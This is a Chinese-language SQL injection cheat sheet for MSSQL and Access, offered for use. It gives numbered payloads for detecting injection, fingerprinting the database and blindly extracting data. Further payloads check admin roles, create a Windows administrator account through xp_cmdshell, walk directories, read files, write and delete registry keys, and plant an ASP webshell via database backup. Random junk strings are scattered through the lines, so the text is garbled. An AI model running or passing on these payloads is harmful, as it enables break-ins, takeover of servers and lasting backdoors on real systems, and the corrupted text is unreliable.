1.判断是否有注入;and 1=1 ;and 1=2 <dTo-P
2.初步判断是否是mssql ;and user>0 #]ii/Et#x
Riq5Au?*)
3.注入参数是字符'and [查询条件] and ''=' I3xx}^V
BPnZ"w_
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,=tVa])
uBk$zs
5.判断数据库系统 A$RN7#
Ms*;?qtrR
;and (select count(*) from sysobjects)>0 mssql * xs8/?
DVYY1!j<
;and (select count(*) from msysobjects)>0 access ]?L?q2>&
<3;/,>^ Pm
$S$%avRX
Aa&3x~3+
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ~ e[)]b3
c@{,&,vsj
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 B @]( ,
L4aT=of-
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 I\sCH
(r,RwWYm
9.(1)猜字段的ascii值(access) #(@dN+
1$fA9u$
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 voaRh@DZ%/
F!VC19<1O8
(2)猜字段的ascii值(mssql) P%smX`v
C,Je >G
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ru)%0Cyx
d}b#"A
10.测试权限结构(mssql) n<7#?X7
M`umfw T
`SWf)1K
+MOUO$;fGt
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- kX{c+qHM
~K^Z4
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- WKpHb:H
.N]^g#
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- KhZ'Ic[vw
7,|-%!p[
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- +v&+8S`+
R+Ke|C
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 8T
6jM+ h
bt#=p7W
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- )zt*am;
52*zX 3
;and 1=(select IS_MEMBER('db_owner'));-- ^zqz$G#
<?Fgm1=o
v}-'L#6
R\yw9!ESd
11.添加mssql和系统的帐户 &&[j/d}J
~@R=]l"
;exec master.dbo.sp_addlogin username;-- %@*diJ
;exec master.dbo.sp_password null,username,password;-- hdN3r{
GVY_u@6
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ~9]tt\jN*Y
eUqsvF}l!
;exec master.dbo.xp_cmdshell 'net user username password &cDnZ3Q;
pz?.(AmU\
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Q=~e|
Oa7`Y`6
;exec master.dbo.xp_cmdshell 'net user username password /add';-- L4SFu.J'
2NsI3M4$8
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- blaxUP:
`
M"Zq
L<QqQ"`
t ba%L
12.(1)遍历目录 f?[y-
yS7[=S
;create table dirs(paths varchar(100), id int) Ik=KEOz
I2|iqbX40Q
;insert dirs exec master.dbo.xp_dirtree 'c:\' Y cOtPS%
)y.J2_lI8
;and (select top 1 paths from dirs)>0 Cb.~Dv
!
y"!+Fus9
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ykl./uY'
1NN99^q
"v jFL9
tb&{[|O^
(2)遍历目录 Fg5c;sls
GC$Hp!H
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- V'^s5
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 .knRH^
5`6@CRef
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 2#6yO`?uo
sxnj`z
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Tp[ub(/;7
Y4!v1
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 ]O7I7K
<8r%_ ']
33[2$FBf
wvJm)Mj+
13.mssql中的存储过程 hV'JTU]H
#12PO q
xp_regenumvalues 注册表根键, 子键 $+S'Boo
l4hC>q$T
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 '!{zO"
1*
K!HSQ,AC
xp_regread 根键,子键,键值名 E n{vCN
zWB>;Z}
;exec xp_regread N}VKH5U|
292e0cE
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 &cayhL/%
`<y2l94tL
xp_regwrite 根键,子键, 值名, 值类型, 值 o*I=6`j
2HkP$;lED
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 mWUQF"q8
yWFDGk
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 cL<
fX#Em'Ab[
xp_regdeletevalue 根键,子键,值名 `EBo(^n}O
`dn|nI2
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 U`IDZ{g
\ tF><
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 &`pd&U{S*
8>6+]]O
o}7`SYn
:s$ rD
14.mssql的backup创建webshell 0z_e3H{P27
V8`t7[r
use model MPT*[&\-
2m[z4V@`
create table cmd(str image); & 2>W=h
+<|6y46
insert into cmd(str) values (''); I
r<5%
e6QUe.S
backup database model to disk='c:\l.asp'; rC[*x}
g15e|y)th
j5G8IP_Wx
`kVy1WiY
15.mssql内置函数 m+"?;;s
DE^{8YX,
;and (select @@version)>0 获得Windows的版本号 K.",=\53
vv"_u=H
;and user_name()='dbo' 判断当前系统的连接用户是不是sa #l+U(zH:JG
,g6w2y7 ]
;and (select user_name())>0 爆当前系统的连接用户 $3W[fC
k^S=i_ U
;and (select db_name())>0 得到当前连接的数据库 bh3}[O,L
A
sZFjkfak
JN$v=Ox{
2jOh~-LU
16.简洁的webshell m/Q@ -
[- a2<E
use model %'%ej^s-R
75jq+O_:
create table cmd(str image); MU<Y,4/k
+(`
insert into cmd(str) values (''); GTeFDm;T^
>ys>Q)
backup database model to disk='g:\wwwtest\l.asp';